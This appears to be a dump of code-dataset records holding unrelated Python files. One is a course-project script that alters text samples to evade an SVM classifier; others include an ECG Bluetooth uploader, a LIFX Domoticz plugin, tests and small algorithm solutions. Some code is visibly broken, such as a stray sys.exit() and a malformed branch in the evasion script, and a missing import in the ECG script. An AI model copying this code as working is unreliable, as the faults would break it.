y_train)\nclf.fit(train_data_matrix, y_train)\n\n\nsys.exit()\nsv_index_class_0 = clf.n_support_[0]\nsv_index_class_1 = clf.n_support_[1]\n\n\nsupport_vectors_for_class_0 = clf.support_vectors_[ :sv_index_class_0]\nsupport_vectors_index_for_class_0 = clf.support_[ :sv_index_class_0]\n\n\nsupport_vectors_for_class_1 = clf.support_vectors_[sv_index_class_0: ]\nsupport_vectors_index_for_class_1 = clf.support_[sv_index_class_0: ]\n\nfor test_instance in test_data_matrix:\n test_distance_to_class_0_sv = euclidean_distances([test_instance], support_vectors_for_class_0)\n\n min_index = np.argmin(test_distance_to_class_0_sv)\n target_train_instance_index = support_vectors_index_for_class_0[min_index]\n target_train_instance = train_data_matrix[target_train_instance_index]\n\n\n diff = abs(target_train_instance - test_instance)\n L = []\n for i in range(len(diff)):\n L.append((i, diff[i]))\n\n\n L = sorted(L, key = lambda x: x[1], reverse=True)\n\n\n change_count = 0\n \n for index in L:\n## print(f'change count: {change_count}')\n i = index[0]\n\n if change_count == 20:\n\n\n if test_instance[i] != 0 and target_train_instance[i] != 0:\n #\n # previous value and decision distance\n save_value = test_instance[i]\n previous_dd = clf.decision_function([test_instance])\n \n # now change\n test_instance[i] = target_train_instance[i]\n\n # compare\n\n now_dd = clf.decision_function([test_instance])\n\n if now_dd < previous_dd:\n continue\n\n else:\n test_instance[i] = save_value\n continue\n\n \n if test_instance[i] != target_train_instance[i]:\n\n\n # not a modification\n if test_instance[i] != 0 and target_train_instance[i] != 0:\n #\n # previous value and decision distance\n save_value = test_instance[i]\n previous_dd = clf.decision_function([test_instance])\n \n # now change\n test_instance[i] = target_train_instance[i]\n\n # compare\n\n now_dd = clf.decision_function([test_instance])\n\n if now_dd < previous_dd:\n continue\n\n else:\n test_instance[i] = save_value\n\n #\n # deletion\n elif test_instance[i] != 0 and target_train_instance[i] == 0:\n #\n # previous value and decision distance\n save_value = test_instance[i]\n previous_dd = clf.decision_function([test_instance])\n\n # now change\n test_instance[i] = 0\n\n # compare\n now_dd = clf.decision_function([test_instance])\n\n if now_dd < previous_dd:\n change_count += 1\n \n continue\n else:\n test_instance[i] = save_value\n\n #\n # addition\n elif test_instance[i] == 0 and target_train_instance[i] != 0:\n #\n # previous value and decision distance\n save_value = test_instance[i]\n previous_dd = clf.decision_function([test_instance])\n\n # now change\n test_instance[i] = target_train_instance[i]\n\n # compare\n now_dd = clf.decision_function([test_instance])\n\n if now_dd < previous_dd:\n change_count += 1\n \n continue\n else:\n test_instance[i] = save_value\n\n #\n # no modification\n elif test_instance[i] == 0 and target_train_instance[i] == 0:\n continue\n \n\n\n\n## print(change_count)\n## break\n \n \n\n \nwords_in_test_not_in_train = set(word_list_test) - set(word_list_class_0_1)\n\n\n\nmodified_data = 'modified_data.txt'\n\n##with open(modified_data, 'a') as f:\n## for word in words_in_test_not_in_train:\n## f.write(f'{word}: ')\n## for modified_test_instance in test_data_matrix:\n## for i in range(len(modified_test_instance)):\n## if modified_test_instance[i] == 0:\n## continue\n##\n## f.write(f'{word_list_class_0_1[i]} ' * modified_test_instance[i])\n##\n## f.write('\\n')\n \n \nwith open(modified_data, 'a') as f:\n for i in range(len(test)):\n words_in_original = test[i]\n words_in_training = word_list_class_0_1\n words_all = set(words_in_original) | set(words_in_training)\n \n modified_test_instance = test_data_matrix[i]\n\n for word in words_all:\n if word not in words_in_training:\n f.write(f'{word} ')\n else:\n word_index = word_list_class_0_1.index(word)\n\n if modified_test_instance[word_index] == 0:\n continue\n\n f.write(f'{word} ' * modified_test_instance[word_index])\n\n f.write('\\n')\n\n \n\n\n\n\n##..................................#\n#\n#\n#\n## Your implementation goes here....#\n#\n#\n#\n##..................................#\n\n\n## Write out the modified file, i.e., 'modified_data.txt' in Present Working Directory...\n\n\n## You can check that the modified text is within the modification limits.\nmodified_data='./modified_data.txt'\nassert strategy_instance.check_data(test_data, modified_data)\n\n#return strategy_instance ## NOTE: You are required to return the instance of this class.\n\n\n\n##fool_classifier('test_data.txt')\n","sub_path":"COMP9318-Project/submission/v3/help_V3_1.py","file_name":"help_V3_1.py","file_ext":"py","file_size_in_byte":8110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"642721240","text":"import pickle\nfrom sklearn.externals import joblib\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\n\nvocabularyFile = pickle.load(open('TfidfVectorizerModel.pkl', 'rb'))\nMultinomialNBModel = joblib.load(open('MultinomialNBModel.pkl','rb'))\n\ntransformer = TfidfTransformer()\ntrainedVectorizer = CountVectorizer(decode_error='replace',vocabulary=vocabularyFile)\n\ndef hello(data):\n fitVectorizer = trainedVectorizer.fit_transform([str(data)])\n fitTransformer = transformer.fit_transform(fitVectorizer)\n return(str(MultinomialNBModel.predict(fitTransformer)))\n","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"372960235","text":"# Copyright 2017 trivago N.V.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nfrom logging import getLoggerClass, addLevelName, setLoggerClass, NOTSET, CRITICAL, ERROR, WARNING, INFO, DEBUG\n# see https://docs.python.org/2/library/logging.html#logging-levels\nNOTICE = 25\nFORMAT = \"%(levelname)s:\\t[%(name)s]\\t%(message)s\"\n\n\nclass MyLogger(getLoggerClass()):\n\n def __init__(self, name, level=NOTSET):\n super(MyLogger, self).__init__(name, level)\n addLevelName(NOTICE, \"NOTICE\")\n\n def notice(self, msg, *args, **kwargs):\n if self.isEnabledFor(NOTICE):\n self._log(NOTICE, msg, args, **kwargs)\n\n\nsetLoggerClass(MyLogger)\n\nroot_logger = logging.getLogger('root')\n\nif not root_logger.handlers:\n logging.basicConfig(level=NOTICE, format=FORMAT)\n","sub_path":"boerewors/logging_helper.py","file_name":"logging_helper.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117816972","text":"#Diptongos crecientes\tua, ue, uo, ia, ie, io\n#Diptongos decrecientes\tai, ei, oi, au, eu, ou\n#Diptongos homogéneos\tiu, ui\n\n\ndiptongos = 'ua','ue','uo','ia','ie','io','ai','ei','oi','au','eu','ou','iu','ui'\n\ntexto = \"\"\"\nLaura y aurora escucharon un aullido \nen la lejanía; quisieron saber de dónde venía,\npero sólo pudieron ver a un gaucho que pasaba por el lugar,\na quien le dijeron; si averiguáis quién causó el aullido \nle daremos una recompensa mi querido señor.\n\"\"\"\n\n\ndef dip_1():\n\n\tconteo = [(i,texto.count(i)) for i in diptongos]\n\tprint(conteo)\n\n\ndef dip_2():\n\n\tconteo = {i:texto.count(i) for i in diptongos}\n\tprint(conteo)\n\n\nconteo = map(lambda x:(x,texto.count(x)),diptongos)\n#print(*conteo)\n\nfrom collections import Counter\nimport re\nprint(Counter(re.findall(r'^\\w[au]',texto)))","sub_path":"Scripts/Miscellany/diptongos.py","file_name":"diptongos.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"285768402","text":"import os\nfrom distutils.core import setup\n\ndef get_packages_path():\n packages_path = ['Salsa']\n for sub_package in ['core','controllers']:\n full_package_path = os.path.join('Salsa',sub_package)\n packages_path.extend((x[0] for x in os.walk(full_package_path)))\n return packages_path\n\nsetup(name=\"Salsa\", version=\"0.1\",\n description=\"Salsa\",\n author=\"T.Coutinho (ESRF), H.Homs (ESRF), S.Petitdemange (ESRF)\",\n package_dir={\"Salsa\": \"Salsa\"},\n packages=get_packages_path(),\n package_data={'Salsa':['*.html', 'css/*.css', \"js/*.js\"]},\n scripts = ['bin/Salsa'],) \n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503946277","text":"\"\"\"\nFind good neuron parameters for computing a sigmoid.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport nengo\nfrom nengo.dists import Uniform, UniformHypersphere\n\nN = 3\nradius = 5\n\n\ndef sigmoid_radius(x):\n return 1. / (1 + np.exp(-radius * x))\n\n\ndef encoders_rates_intercepts(seed):\n rng = np.random.RandomState(seed)\n encoders = np.ones((N, 1))\n intercepts = Uniform(-0.5, 0.8).sample(N, rng=rng)\n max_rates = Uniform(200, 400).sample(N, rng=rng)\n return encoders, max_rates, intercepts\n\n\ndef residual(encoders, max_rates, intercepts, eval_points, show=False):\n neurons = nengo.LIF()\n gains, biases = neurons.gain_bias(max_rates, intercepts)\n A = neurons.rates(np.dot(eval_points, encoders.T), gains, biases)\n y = sigmoid_radius(eval_points)\n d, _ = nengo.solvers.LstsqL2()(A, y)\n r = np.dot(A, d) - y\n r2 = np.sqrt(np.dot(r.T, r))\n\n if show:\n plt.figure(101)\n plt.clf()\n x = np.linspace(-1, 1, 501).reshape(-1, 1)\n a = neurons.rates(np.dot(x, encoders.T), gains, biases)\n y = sigmoid_radius(x)\n yhat = np.dot(a, d)\n plt.plot(x, y, 'k--')\n plt.plot(x, yhat)\n\n return r2\n\n\ndef find_params(savefile=None, show=False):\n rng = np.random.RandomState(9)\n eval_points = UniformHypersphere().sample(750, 1, rng=rng)\n\n residuals = []\n for i in range(1000):\n encoders, max_rates, intercepts = encoders_rates_intercepts(i)\n r = residual(encoders, max_rates, intercepts, eval_points)\n residuals.append((i, r))\n\n residuals = sorted(residuals, key=lambda x: x[1])\n\n seed = residuals[0][0]\n encoders, max_rates, intercepts = encoders_rates_intercepts(seed)\n residual(encoders, max_rates, intercepts, eval_points, show=show)\n\n if savefile:\n np.savez(savefile,\n N=N, radius=radius, encoders=encoders,\n max_rates=max_rates, intercepts=intercepts)\n\n return N, radius, encoders, max_rates, intercepts\n","sub_path":"find_neuron_params.py","file_name":"find_neuron_params.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535023324","text":"\"\"\"Tests for GNR module of pytaxize\"\"\"\nimport os\nimport pytaxize\n\nfrom vcr_unittest import VCRTestCase\n\n# expected results\nexp1 = {u'canonical_form': u'Helianthus annus',\n u'classification_path': u'',\n u'classification_path_ids': u'',\n u'classification_path_ranks': u'',\n u'data_source_id': 12,\n u'data_source_title': u'EOL',\n u'edit_distance': 0,\n u'gni_uuid': u'f5674e32-00cc-57e3-b632-6a0b89fa4df4',\n u'imported_at': u'2012-05-08T02:42:50Z',\n u'local_id': u'468106',\n u'match_type': 1,\n u'match_value': u'Exact string match',\n u'name_string': u'Helianthus annus',\n u'prescore': u'3|0|0',\n u'score': 0.988,\n u'taxon_id': u's_5106367',\n u'url': u'http://eol.org/pages/468106/names/synonyms'}\n\nclass Gnr(VCRTestCase):\n\t\tdef test_gnr_resolve(self):\n\t\t\t\"Basic test of of gnr_resolve\"\n\t\t\tassert exp1 == pytaxize.gnr_resolve('Helianthus annus')[0][0]\n\n# def test_gnr_resolve_remove_temporary_file():\n# \t\"\"\"test if delete temporary name list file in gnr_resolve\"\"\"\n# \twith open('test/data/species_list.txt', 'rb') as f:\n# \t\tname_list = f.readlines()\n# \tpytaxize.gnr_resolve( name_list[0:301] )\n# \tassert os.path.isfile('names_list.txt') == False\n\n# def test_gnr_resolve_larger_1000():\n# \t\"\"\"test if work well when queried number larger than 1000\"\"\"\n# \twith open('test/data/species_list.txt', 'rb') as f:\n# \t\tname_list = f.readlines()\n# \tassert len(pytaxize.gnr_resolve( name_list )) == len(name_list)\n","sub_path":"test/test_gnr.py","file_name":"test_gnr.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"59398296","text":"#!/usr/bin/env python3\n\nimport pytest\n\n\nclass TestServerVersion(object):\n\n def test_version(self, hge_ctx):\n resp = hge_ctx.http.get(\n hge_ctx.hge_url + '/v1/version'\n )\n my_json = resp.json()\n assert my_json['version'] == hge_ctx.version, my_json\n","sub_path":"server/tests-py/test_version.py","file_name":"test_version.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"181006301","text":"import sublime\nfrom sublime_plugin import WindowCommand\n\nfrom ..git_command import GitCommand\nfrom ...common import util\n\n\nALL_REMOTES = \"All remotes.\"\n\n\nclass GsCustomCommand(WindowCommand, GitCommand):\n\n \"\"\"\n Run the specified custom command asynchronously.\n \"\"\"\n\n def run(self, **kwargs):\n sublime.set_timeout_async(lambda: self.run_async(**kwargs), 0)\n\n def run_async(self,\n output_to_panel=False,\n args=None,\n start_msg=\"Starting custom command...\",\n complete_msg=\"Completed custom command.\"):\n\n if not args:\n sublime.error_message(\"Custom command must provide args.\")\n\n for idx, arg in enumerate(args):\n if arg == \"{REPO_PATH}\":\n args[idx] = self.repo_path\n elif arg == \"{FILE_PATH}\":\n args[idx] = self.file_path\n\n sublime.status_message(start_msg)\n stdout = self.git(*args)\n sublime.status_message(complete_msg)\n\n if output_to_panel:\n util.log.panel(stdout)\n","sub_path":"core/commands/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"479952195","text":"import numpy as np\nfrom math import log\n\ndef Energy(GLCM):\n\tenergy = np.sum(GLCM**2)\n\treturn energy\ndef Constrast(GLCM):\n\tind = np.indices(GLCM.shape)\n\ti = ind[0]\n\tj = ind[1]\n\tconstrast = np.sum(GLCM*((i-j)**2))\n\treturn constrast\ndef Homogeneity(GLCM):\n\tind = np.indices(GLCM.shape)\n\ti = ind[0]\n\tj = ind[1]\n\thomogeneity = np.sum(GLCM/(1+abs(i-j)))\n\treturn homogeneity\ndef Entropy(GLCM):\n\tentropy = np.sum(GLCM*(-np.log(np.where(GLCM[:]!=0, GLCM, 1))))\n\treturn entropy\ndef img_features (img_aux):\n\timg = img_aux.copy()\n\th, w, aux = img.shape\n\timg_gray = np.zeros((h, w), dtype=int)\n\timg_CR = np.zeros((h, w), dtype=int)\n\tKB, KG, KR = 114, 587, 299\n\tCR_KB, CR_KG, CR_KR = -81, -418, 500 \n\tB, G, R = (0, KB, CR_KB), (1, KG, CR_KG), (2, KR, CR_KR)\n\tcores = B, G, R\n\tind, Y_K, CR_K= 0, 1, 2\n\tnormalizar = h*(w-1)\n\tfor cor in cores:\n\t\timg_gray += (img[:, :, cor[ind]]*cor[Y_K])/1000\n\t\timg_CR += (img[:, :, cor[ind]]*cor[CR_K])/1000\n\timg_CR += 128\n\tGLCM_Gray = np.zeros((256, 256), dtype=float)\n\tnp.add.at(GLCM_Gray, (img_gray[:, 0:(w-1)], img_gray[:, 1:w]), 1.0)\n\tGLCM_Gray /= normalizar\n\n\tGLCM_CR = np.zeros((256, 256), dtype=float)\n\tnp.add.at(GLCM_CR, (img_CR[:, 0:(w-1)], img_CR[:, 1:w]), 1.0)\n\tGLCM_CR /= normalizar\n\n\treturn Energy(GLCM_Gray), Homogeneity(GLCM_Gray), \\\n\tEntropy(GLCM_Gray), Constrast(GLCM_Gray), \\\n\tEnergy(GLCM_CR), Homogeneity(GLCM_CR), \\\n\tEntropy(GLCM_CR), Constrast(GLCM_CR);\n","sub_path":"source/selection/feature_S.py","file_name":"feature_S.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"617985584","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport unittest\nimport subprocess\n\nimport maucl\n\n\nclass DefaultTestCase(unittest.TestCase):\n def test_disable_au(self):\n maucl.set_pref()\n o = subprocess.check_output(['defaults',\n 'read',\n 'com.microsoft.autoupdate2',\n 'HowToCheck'])\n self.assertEquals(o.strip(), 'Manual')\n\n def test_enable_au(self):\n maucl.set_pref(v='Automatic')\n o = subprocess.check_output(['defaults',\n 'read',\n 'com.microsoft.autoupdate2',\n 'HowToCheck'])\n self.assertEquals(o.strip(), 'Automatic')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"578750115","text":"class Solution(object):\n def canFinish(self, num_courses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n if num_courses <= 1:\n return True\n depend_list = [[] for _ in xrange(num_courses)]\n back_list = [[] for _ in xrange(num_courses)]\n for i,j in prerequisites:\n depend_list[i].append(j)\n back_list[j].append(i)\n leaves = [i for i in xrange(num_courses) if len(depend_list[i])==0]\n while len(leaves) > 0:\n new_leaves = []\n for leave_i in leaves:\n for back_j in back_list[leave_i]:\n depend_list[back_j].remove(leave_i)\n if len(depend_list[back_j]) == 0: \n new_leaves.append(back_j)\n back_list[leave_i] = []\n leaves = new_leaves\n for depend in depend_list:\n if len(depend) >0 :\n return False\n return True\n\n def canFinish(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n from collections import defaultdict\n mem = defaultdict(list)\n visited, handled = set(), set()\n for src, dst in prerequisites:\n mem[src] += dst,\n def dfs(src):\n handled.add(src)\n visited.add(src)\n for i in mem[src]:\n if i in visited:\n return False\n else:\n if i not in handled:\n if not dfs(i):\n return False\n visited.discard(src)\n return True\n for i in range(numCourses):\n if i not in handled:\n if not dfs(i):\n return False\n return True\n # bad performance\n def canFinish(self, n, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n matrix = [ [0] * n for _ in range(n)] \n in_degrees = [0] * n\n for src, dst in prerequisites:\n matrix[dst][src] = 1\n in_degrees[src] += 1\n count, q = 0, []\n for i in range(n):\n if in_degrees[i] == 0: \n q += i,\n while q:\n dst = q.pop(0)\n count += 1\n for i in range(n):\n if matrix[dst][i]>0:\n in_degrees[i] -= 1\n if in_degrees[i] == 0:\n q += i,\n count.p()\n return count == n\n# public boolean canFinish(int numCourses, int[][] prerequisites) {\n# int[][] matrix = new int[numCourses][numCourses]; // i -> j\n# int[] indegree = new int[numCourses];\n \n# for (int i=0; i queue = new LinkedList();\n# for (int i=0; i length:\n return i\n -----------------------\n 运行时间:\n 占用内存:\n -----------------------\n \"\"\"\n def MoreThanHalfNum_Solution(self, numbers):\n if len(numbers) == 1:\n return numbers[0]\n\n length = len(numbers) // 2\n numtimes = 1\n num = 0\n for i in range(len(numbers)):\n if numtimes == 0:\n numtimes += 1\n num = numbers[i]\n elif num == numbers[i]:\n numtimes += 1\n else:\n numtimes -= 1\n\n times = 0\n for j in numbers:\n if num == j:\n times += 1\n if times > length:\n return num\n else:\n return 0\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n print(solution.MoreThanHalfNum_Solution([1,2,3,2,4,3,3,3,3,3]))\n","sub_path":"code/train/箭指Offer/src/数组中出现次数超过一半的数字.py","file_name":"数组中出现次数超过一半的数字.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"428137531","text":"import config\nimport platform\nimport thread\nfrom threading import Timer\nimport boto3\nimport bluetooth\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\nfrom bluetooth_module import BluetoothConnect\nfrom decode_bytes import decoder\nfrom ring_buffer import RingBuffer\nfrom file_handler import FileHandler\n\n\ntopic = \"ecg/status\"\n\ngg_client = greengrasssdk.client('iot-data')\n\nmy_platform = platform.platform()\n\nmy_counter = 0\n\nring_buffer = RingBuffer()\nfile_handler = FileHandler()\n\nbt_con = BluetoothConnect(\n host_address=config.bluetooth['host_address'],\n port=config.bluetooth['port']\n )\n\ns3_client = boto3.client('s3',\n aws_access_key_id=config.aws['access_key'],\n aws_secret_access_key=config.aws['secret_key'])\n\nrecording = False\n\n\ndef log(text):\n print(text)\n gg_client.publish(topic=topic, payload=text)\n\n\ndef connect_to_device():\n global bt_con\n bt_con = BluetoothConnect(\n host_address=config.bluetooth['host_address'],\n port=config.bluetooth['port']\n )\n return bt_con.connect()\n\n\ndef begin_recording(*args):\n global recording, topic\n ring_buffer.clear()\n while True:\n try:\n recording = True\n if bt_con.connected is False:\n recording = False\n thread.exit()\n return\n data = bt_con.get_data()\n data_model = decoder(data)\n ring_buffer.add(data_model.ecg)\n log(\"data: {}\".format(data_model.ecg))\n except TypeError as e:\n print(\"Unexpected TypeError occured\", e)\n except IndexError as e:\n print(\"Index error from device\", e)\n except bluetooth.btcommon.BluetoothError as e:\n log(\"Lost connection to device. Attempting to reconnect\")\n bt_con.connected = False\n\n\ndef upload_files():\n files = [f for f in listdir(config.data['location']) if isfile(join(config.data['location'], f))]\n for file in files:\n s3_client.upload_file(\n \"{}/{}\".format(config.data['location'], file),\n config.aws['bucket_name'],\n \"{}/{}\".format(config.device['id'], file))\n os.remove(\"{}/{}\".format(config.data['location'], file))\n\n\ndef record_data():\n global recording, topic\n\n # If no connection is established, connect\n if bt_con.connected is False:\n log(\"Attempting to connect to bluetooth ecg device\")\n connected = connect_to_device()\n if connected is False:\n log(\"Attempting to connect again in {} seconds\".format(config.bluetooth['reconnect_time']))\n Timer(config.bluetooth['reconnect_time'], record_data).start()\n return\n\n if recording is False:\n recording = True\n thread.start_new(begin_recording, (None,))\n\n # If connected and thread has started, begin saving\n if len(ring_buffer.buffer) > config.bluetooth['save_size']:\n file_name = file_handler.save_signal(ring_buffer.get_buffer(clear=True), \"ecg\")\n log(\"Saving buffer to file at location {}/{}\".format(\n config.data['location'],\n file_name\n ))\n Timer(0, upload_files).start()\n Timer(1, record_data).start()\n\n\n\ndef function_handler(event, context):\n return\n\nrecord_data()","sub_path":"lambdas/ecg_processing.py","file_name":"ecg_processing.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247030602","text":"# Domoticz Lifx Plugin\n# Uses lightsd, a daemon to control smart bulbs by lopter: https://github.com/lopter/lightsd/\n#\n\"\"\"\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\"\"\"\nimport Domoticz\nimport json\nimport base64\nimport socket\nimport random\nimport math\n\nREAD_SIZE = 4096\nENCODING = \"utf-8\"\ndevtypes={\"Original 1000\":(241,4,7),\"White 800\":(241,3,7),\"LIFX Z\":(241,4,7),\"Color 1000\":(241,4,7),\"Unknown\":(241,4,7)}\n\nclass BasePlugin:\n lightsd_socket=\"\"\n mydevices={}\n inv_mydevices = {}\n HBpass=0\n \n def __init__(self):\n return\n\n def onStart(self):\n if Parameters[\"Mode6\"] == \"Debug\":\n Domoticz.Debugging(1)\n \n if Parameters[\"Mode4\"] == \"INET\":\n Domoticz.Debug(\"INET\")\n self.lightsd_socket = socket.socket(socket.AF_INET)\n self.lightsd_socket.connect((str(Parameters[\"Address\"]),int(Parameters[\"Port\"])))\n \n else:\n Domoticz.Debug(\"UNIX\")\n self.lightsd_socket = socket.socket(socket.AF_UNIX)\n self.lightsd_socket.connect(str(Parameters[\"Mode3\"]))\n \n self.lightsd_socket.settimeout(1) # seconds \n confFile=str(Parameters[\"HomeFolder\"])+\"_lifx\"\n try:\n with open(confFile) as infile:\n self.mydevices = json.load(infile)\n except Exception:\n self.mydevices={}\n self.inv_mydevices = {v: k for k, v in self.mydevices.items()}\n \n if Parameters[\"Mode5\"] == \"Rescan\":\n for Device in list(self.mydevices.keys()):\n Domoticz.Debug(Device + \":\"+ self.mydevices[Device])\n try:\n found=Devices[int(Device)]\n except KeyError:\n self.mydevices.pop(Device)\n k=0\n for devices in self.mydevices.keys():\n k=max(k,int(devices))\n myResult = queryLIFX()\n Domoticz.Debug(\"Devices \" + str(self.mydevices))\n Domoticz.Debug(\"Devices \" + str(k))\n for i in range(len(myResult)):\n Domoticz.Debug(\"LIFX: \" + str(myResult[i][\"hsbk\"]))\n myName = \"Lamp\"\n myPower=1\n myLevel=100\n myModel = myResult[i][\"_model\"]\n myType = devtypes[myModel][0] #myType=244\n mySType=devtypes[myModel][1] #mySType=73\n mySwitchtype=devtypes[myModel][2] #7\n myPower=10 if (myResult[i][\"power\"]) else 0\n myLevel=str(int(myResult[i][\"hsbk\"][2]*100))\n MACADDR=str(myResult[i][\"_lifx\"][\"addr\"].replace(\":\",\"\"))\n myName = str(myResult[i][\"label\"])\n #myName = str(myResult[i][\"_model\"])\n try:\n Unit=int(self.inv_mydevices[MACADDR])\n UpdateDevice(Unit, myPower, myLevel)\n Domoticz.Debug(\"Devices exist. \" + str(Unit))\n except Exception:\n k+=1\n Domoticz.Device(Name=myName, Unit=(k), Type=myType, Subtype=mySType, Switchtype=mySwitchtype).Create()\n self.mydevices[str(k)]=MACADDR\n Domoticz.Debug(\"Devices created. \" + str(k)) \n UpdateDevice(k, myPower, myLevel)\n with open(confFile, 'w') as outfile:\n json.dump(self.mydevices, outfile)\n self.inv_mydevices = {v: k for k, v in self.mydevices.items()}\n Domoticz.Heartbeat(25)\n Domoticz.Debug(\"onStart called\")\n \n def onStop(self):\n Domoticz.Debug(\"onStop called\")\n\n def onConnect(self, Status, Description):\n Domoticz.Debug(\"onConnect called\")\n\n def onMessage(self, Data, Status, Extra):\n Domoticz.Debug(\"onMessage called:\")\n\n def onCommand(self, Unit, Command, Level, Color):\n MACADDR=self.mydevices[str(Unit)]\n Domoticz.Debug(\"onCommand called for Lifx #\" + str(Unit) + \": Parameter '\" + str(Command) + \"', Level: \" + str(Level) + \", Color: \" + str(Color))\n if (Command == 'On'):\n setLIFX(\"power_on\", [MACADDR])\n UpdateDevice(Unit, 10, Devices[Unit].sValue)\n elif (Command == 'Off'):\n setLIFX(\"power_off\", [MACADDR])\n UpdateDevice(Unit, 0, Devices[Unit].sValue)\n elif (Command == 'Set Level'):\n myResult = queryLIFX(Params=MACADDR)\n h, s, b, k = myResult[0][\"hsbk\"]\n b=Level/100\n setLIFX(\"set_light_from_hsbk\", [MACADDR, h,s,b,k,0])\n UpdateDevice(Unit, 15, str(Level))\n elif (Command == 'Set Color'):\n myResult = queryLIFX(Params=MACADDR)\n h, s, b, k = myResult[0][\"hsbk\"]\n ColorJ=json.loads(Color)\n Domoticz.Debug(\"Get Color HSB Lifx #\" + str(Unit) + \">>\" + str(h) + \":\"+ str(s) + \":\"+ str(b)+ \":\"+ str(k))\n red=ColorJ[\"r\"]/255\n green=ColorJ[\"g\"]/255\n blue=ColorJ[\"b\"]/255\n mmode=ColorJ[\"m\"]\n t=ColorJ[\"t\"]\n v=0\n if (mmode==2): # set temp\n h=0\n s=0\n v=Level/100\n k=translate(t,255,0,2500,9000)\n elif (mmode==3): # set color\n h, s, v = rgb_to_hsv(red, green, blue)\n setLIFX(\"set_light_from_hsbk\", [MACADDR, h,s,b,k,0])\n setLIFX(\"power_on\", [MACADDR])\n UpdateDevice(Unit, 10, Devices[Unit].sValue)\n UpdateDevice2(Unit, 15, str(Level), str(Color)) \n Domoticz.Debug(\"Set Color RGB Lifx #\" + str(Unit) + \">>\" + str(red) + \":\"+ str(green) + \":\"+ str(blue) + \" mode:\" + str(mmode)+ \" temp:\" + str(t))\n Domoticz.Debug(\"Set Color HSB Lifx #\" + str(Unit) + \">>\" + str(h) + \":\"+ str(s) + \":\"+ str(v) + \":\"+ str(k))\n def onNotification(self, Data):\n Domoticz.Debug(\"onNotification: \" + str(Data))\n\n def onDisconnect(self):\n Domoticz.Debug(\"onDisconnect called\")\n\n def onHeartbeat(self):\n if(self.HBpass==0):\n myResult = queryLIFX()\n ColorStr='';\n for i in range(len(myResult)):\n MACADDR=str(myResult[i][\"_lifx\"][\"addr\"].replace(\":\",\"\"))\n myPower=10 if (myResult[i][\"power\"]) else 0\n h, s, b, k = myResult[i][\"hsbk\"]\n myLevel=str(int(b*100))\n if (s==0):\n t = translate(k,2500,9000,255,0)\n ColorStr='{\"m\":2,\"r\":0,\"g\":0,\"b\":0,\"t\":'+ str(t) +',\"ww\":0,\"cw\":0}'\n else:\n red, green, blue = hsv_to_rgb(h, s, 1)\n ColorStr='{\"m\":3,\"r\":' + str(red) + ',\"g\":' + str(green) + ',\"b\":' + str(blue) + ',\"t\":0,\"cw\":0,\"ww\":0}'\n try:\n myDevice=int(self.inv_mydevices[MACADDR])\n UpdateDevice2(myDevice, myPower, myLevel, ColorStr)\n Domoticz.Debug(\">>Lifx #\" + str(myDevice) + \" ColorStr \" + ColorStr)\n Domoticz.Debug(\">>Lifx #\" + str(myDevice) + \" power \" + str(myPower) + \" Level \" + str(myLevel))\n Domoticz.Debug(\">>Lifx #\" + str(myDevice) + \" hsbk \" + str(myResult[i][\"hsbk\"]))\n except KeyError:\n Domoticz.Debug(\"Unknown LIFX device found\")\n self.HBpass=4\n else:\n self.HBpass-=1\n\nglobal _plugin\n_plugin = BasePlugin()\n\ndef onStart():\n global _plugin\n _plugin.onStart()\n\ndef onStop():\n global _plugin\n _plugin.onStop()\n\ndef onConnect(Status, Description):\n global _plugin\n 